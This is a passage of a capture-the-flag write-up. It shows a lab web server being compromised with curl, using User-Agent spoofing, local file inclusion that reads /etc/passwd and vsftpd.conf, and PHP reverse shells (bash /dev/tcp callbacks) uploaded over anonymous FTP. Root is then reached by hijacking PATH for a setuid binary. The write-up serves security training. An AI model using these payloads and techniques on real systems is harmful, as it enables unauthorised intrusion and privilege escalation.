You are not a search engine! You can't read my robots.txt!
* Connection #0 to host 172.16.254.103 left intact

• Attempted curl but spoofed the User-Agent header to pretend to be a search engine curl -v -A Googlebot http://172.16.254.103/robots-txt

*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /robots-txt HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 404 Not Found
< Date: Sat, 21 Mar 2020 02:25:21 GMT
< Server: Apache/2.4.38 (Debian)
< Content-Length: 276
< Content-Type: text/html; charset=iso-8859-1
< 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 172.16.254.103 Port 80</address>
</body></html>
* Connection #0 to host 172.16.254.103 left intact

• Attempted to get the standard robots.txt with the spoofed agent curl -v -A Googlebot http://172.16.254.103/robots.txt

*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /robots.txt HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 02:28:47 GMT
< Server: Apache/2.4.38 (Debian)
< Last-Modified: Sat, 08 Feb 2020 03:26:11 GMT
< ETag: "2d-59e08115bb1ef"
< Accept-Ranges: bytes
< Content-Length: 45
< Content-Type: text/plain
< 
User-agent: *
Disallow: /secret_information/
* Connection #0 to host 172.16.254.103 left intact

• Found: /secret_information/
• Attempted to access the diretory

curl -v -A Googlebot http://172.16.254.103/secret_information/
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /secret_information/ HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 02:31:07 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 1477
< Content-Type: text/html; charset=UTF-8
< 
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

DNS Zone transfer is the process where a DNS server passes a copy of part of it's database (which is called a "zone") to another DNS server. It's how you can have more than one DNS server able to answer queries about a particular zone; there is a Master DNS server, and one or more Slave DNS servers, and the slaves ask the master for a copy of the records for that zone.

A basic DNS Zone Transfer Attack isn't very fancy: you just pretend you are a slave and ask the master for a copy of the zone records. And it sends you them; DNS is one of those really old-school Internet protocols that was designed when everyone on the Internet literally knew everyone else's name and address, and so servers trusted each other implicitly.

It's worth stopping zone transfer attacks, as a copy of your DNS zone may reveal a lot of topological information about your internal network. In particular, if someone plans to subvert your DNS, by poisoning or spoofing it, for example, they'll find having a copy of the real data very useful.

So best practice is to restrict Zone transfers. At the bare minimum, you tell the master what the IP addresses of the slaves are and not to transfer to anyone else. In more sophisticated set-ups, you sign the transfers. So the more sophisticated zone transfer attacks try and get round these controls.




* Connection #0 to host 172.16.254.103 left intact

• Manual review of the two HTML anchor tag suggests that there is a file inclusion of the language files, i.e. en.php and es.php are included in the index.php using the lang parameter. So may have a file inclusion vulnerability here. Tried to confirm local file inclusion (LFI) using curl -v -A Googlebot http://172.16.254.103/secret_information/?lang=../../../../../../../etc/passwd

*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /secret_information/?lang=../../../../../../../etc/passwd HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 02:44:11 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 2191
< Content-Type: text/html; charset=UTF-8
< 
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi-autoipd:x:107:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:114:121::/var/lib/saned:/usr/sbin/nologin
colord:x:115:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:116:123::/var/lib/geoclue:/usr/sbin/nologin
tom:x:1000:1000:Tom,,,:/home/tom:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ftp:x:118:125:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin



* Connection #0 to host 172.16.254.103 left intact

• Found: account named tom
• Found: account for ftp has home directory as /srv/ftp
• Decided to grab a copy of the /etc/group file as well

curl -v -A Googlebot http://172.16.254.103/secret_information/?lang=../../../../../../../etc/group
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /secret_information/?lang=../../../../../../../etc/group HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 07:32:59 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 1009
< Content-Type: text/html; charset=UTF-8
< 
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:tom
floppy:x:25:tom
tape:x:26:
sudo:x:27:
audio:x:29:tom
dip:x:30:tom
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:tom
sasl:x:45:
plugdev:x:46:tom
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
systemd-journal:x:101:
systemd-timesync:x:102:
systemd-network:x:103:
systemd-resolve:x:104:
input:x:105:
kvm:x:106:
render:x:107:
crontab:x:108:
netdev:x:109:tom
messagebus:x:110:
tss:x:111:
bluetooth:x:112:tom
ssl-cert:x:113:
avahi-autoipd:x:114:
rtkit:x:115:
ssh:x:116:
scanner:x:117:saned,tom
avahi:x:120:
saned:x:121:
colord:x:122:
geoclue:x:123:
tom:x:1000:
systemd-coredump:x:999:
ftp:x:125:



* Connection #0 to host 172.16.254.103 left intact

• We may be able to upload a PHP script to perform a remote connection to provide an interactive shell for easier enumeration of the host
• Performed Internet search and found that the following seems to be a populat choice for revrse shell

<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.0.10/1234 0>&1'");

• Setup netcat listener in a separate terminal nc -l -s 172.16.254.100 -p 65535
• Created PHP file called x.php to be uploaded using FTP

cat x.php
<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/171.16.254.100/65535 0>&1'");

• Uploaded the file using FTP as Anonymous user, any password would work, but traditionally used to be email addresses.
• Attempted to exploit the vulnerability but the PHP script was not executed. Attempted a couple of difference location such as the directory containing the uploaded x.php, such as /pub, /srv/ftp/pub
• Decided to manually review the configuration file of the FTP server

curl -v -A Googlebot http://172.16.254.103/secret_information/?lang=../../../../../../../etc/vsftpd.conf
*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /secret_information/?lang=../../../../../../../etc/vsftpd.conf HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 07:56:45 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 6104
< Content-Type: text/html; charset=UTF-8
< 
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

# Example config file /etc/vsftpd.conf
#
# The default compiled in settings are fairly paranoid. This sample file
# loosens things up a bit, to make the ftp daemon more usable.
# Please see vsftpd.conf.5 for all compiled in defaults.
#
# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
# capabilities.
#
#
# Run standalone?  vsftpd can run either from an inetd or as a standalone
# daemon started from an initscript.

anon_umask=000

listen=NO
#
# This directive enables listening on IPv6 sockets. By default, listening
# on the IPv6 "any" address (::) will accept connections from both IPv6
# and IPv4 clients. It is not necessary to listen on *both* IPv4 and IPv6
# sockets. If you want that (perhaps because you want to listen on specific
# addresses) then you must run two copies of vsftpd with two configuration
# files.
listen_ipv6=YES
#
# Allow anonymous FTP? (Disabled by default).
anonymous_enable=YES
#
# Uncomment this to allow local users to log in.
local_enable=YES
#
# Uncomment this to enable any form of FTP write command.
#write_enable=YES
#
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
local_umask=022
#
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you will
# obviously need to create a directory writable by the FTP user.
anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
#anon_mkdir_write_enable=YES
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# If enabled, vsftpd will display directory listings with the time
# in  your  local  time  zone.  The default is to display GMT. The
# times returned by the MDTM FTP command are also affected by this
# option.
use_localtime=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
#
# If you want, you can arrange for uploaded anonymous files to be owned by
# a different user. Note! Using "root" for uploaded files is not
# recommended!
#chown_uploads=YES
#chown_username=whoever
#
# You may override where the log file goes if you like. The default is shown
# below.
#xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format.
# Note that the default log file location is /var/log/xferlog in this case.
#xferlog_std_format=YES
#
# You may change the default value for timing out an idle session.
#idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
#data_connection_timeout=120
#
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
#nopriv_user=ftpsecure
#
# Enable this and the server will recognise asynchronous ABOR requests. Not
# recommended for security (the code is non-trivial). Not enabling it,
# however, may confuse older FTP clients.
#async_abor_enable=YES
#
# By default the server will pretend to allow ASCII mode but in fact ignore
# the request. Turn on the below options to have the server actually do ASCII
# mangling on files when in ASCII mode.
# Beware that on some FTP servers, ASCII support allows a denial of service
# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
# predicted this attack and has always been safe, reporting the size of the
# raw file.
# ASCII mangling is a horrible feature of the protocol.
#ascii_upload_enable=YES
#ascii_download_enable=YES
#
# You may fully customise the login banner string:
#ftpd_banner=Welcome to blah FTP service.
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES
# (default follows)
#banned_email_file=/etc/vsftpd.banned_emails
#
# You may restrict local users to their home directories.  See the FAQ for
# the possible risks in this before using chroot_local_user or
# chroot_list_enable below.
#chroot_local_user=YES
#
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
# the user does not have write access to the top level directory within the
# chroot)
#chroot_local_user=YES
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd.chroot_list
#
# You may activate the "-R" option to the builtin ls. This is disabled by
# default to avoid remote users being able to cause excessive I/O on large
# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
# the presence of the "-R" option, so there is a strong case for enabling it.
#ls_recurse_enable=YES
#
# Customization
#
# Some of vsftpd's settings don't fit the filesystem layout by
# default.
#
# This option should be the name of a directory which is empty.  Also, the
# directory should not be writable by the ftp user. This directory is used
# as a secure chroot() jail at times vsftpd does not require filesystem
# access.
secure_chroot_dir=/var/run/vsftpd/empty
#
# This string is the name of the PAM service vsftpd will use.
pam_service_name=vsftpd
#
# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO

#
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
#utf8_filesystem=YES
#
# Point users at the directory we created earlier.
anon_root=/var/ftp/
write_enable=YES
#



* Connection #0 to host 172.16.254.103 left intact

• Found that the location for Anonymous FTP was in fact /var/ftp/, so attempted to get the file included using the path /var/ftp/pub/x.php but was unsuccessful. I was convinced that the script was being included but perhaps the netcat command was unsuccessful, so updated the script to provide an out to confirm that the script was run as y.php and uploaded y.php using FTP .

<?php
echo __FILE__;
exec("/bin/bash -c 'bash -i > /dev/tcp/171.16.254.100/65535 0>&1'");

• Attempted the file inclusion curl -v -A Googlebot http://172.16.254.103/secret_information/?lang=../../../../../../../var/ftp/pub/y.php

*   Trying 172.16.254.103:80...
* TCP_NODELAY set
* Connected to 172.16.254.103 (172.16.254.103) port 80 (#0)
> GET /secret_information/?lang=../../../../../../../var/ftp/pub/y.php HTTP/1.1
> Host: 172.16.254.103
> User-Agent: Googlebot
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sat, 21 Mar 2020 12:55:07 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 164
< Content-Type: text/html; charset=UTF-8
< 
<title>zone transfer</title>

<h2>DNS Zone Transfer Attack</h2>

<p><a href='?lang=en.php'>english</a> <a href='?lang=es.php'>spanish</a></p>

/var/ftp/pub/y.php


* Connection #0 to host 172.16.254.103 left intact

• So we are able to get the file inclusion exploit but just need a better reverse shell. Grabbed the PentesterMonkey php reverse shell, updated the IP address and port, renamed the file to z.php, and uploaded the file using FTP. Attempted inclusion and success! We have a reverse shell to enumerate the remote host
• Proceeded to manually enumerate the host and found a C program source code. Another executable with the same name as the C program source code existed in the same directory with the suid bit set and owned by root.

$ pwd
/home/tom
$ cat rootshell.c
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

int main() {

    printf("checking if you are tom...\n");
    FILE* f = popen("whoami", "r");

    char user[80];
    fgets(user, 80, f);

    printf("you are: %s\n", user);
    //printf("your euid is: %i\n", geteuid());

    if (strncmp(user, "tom", 3) == 0) {
        printf("access granted.\n");
        setuid(geteuid());
        execlp("sh", "sh", (char *) 0);
    }
}

• Manually reviewed the source code to try and understand the program. The program appears to attempt to create a process and pipe the output to a file handle. A maximum of 80 characters are read into a character array. If the first 3 characters are ‘tom’ then opens an elevated shell
• Created a script called whoami in /tmp to simply echo tom

cat /tmp/whoami                                             
echo tom

• Updated the PATH environment variable to prepend /tmp to it, so that /tmp/whoami would be selected first be default

echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

• Ran the rootshell command and got an elevated shell

cd /root
ls -las
total 64
 4 drwx------  5 root root  4096 Feb  8 21:47 .
 4 drwxr-xr-x 19 root root  4096 Feb  8 12:17 ..
 4 -rw-r--r--  1 root root   570 Jan 31  2010 .bashrc
 4 drwx------  2 root root  4096 Feb  8 12:23 .cache
 4 -rw-------  1 root root    34 Feb  8 12:38 .lesshst
 4 drwxr-xr-x  3 root root  4096 Feb  8 12:54 .local
 4 -rw-r--r--  1 root root   148 Aug 18  2015 .profile
 4 drwxr-xr-x  2 root root  4096 Feb  8 15:11 .vim
24 -rw-------  1 root root 21141 Feb  8 21:40 .viminfo
 4 -rw-r--r--  1 root root    21 Feb  8 14:34 .vimrc
 4 -rw-r--r--  1 root root   141 Feb  8 15:17 flag.txt
cat flag.txt
|\---------------\
||                |
|| UQ Cyber Squad |       
||                |
|\~~~~~~~~~~~~~~~\
|
|
|
|
o

flag{omg_you_did_it_YAY}

• Submitted: flag{omg_you_did_it_YAY}

See also

• QUT Whitehats CTF Week_3
• QUT Whitehats CTF Week_2
• QUT Whitehats CTF Week_1
• AWSN Cadet CTF
• GPG Better than Zip Encryption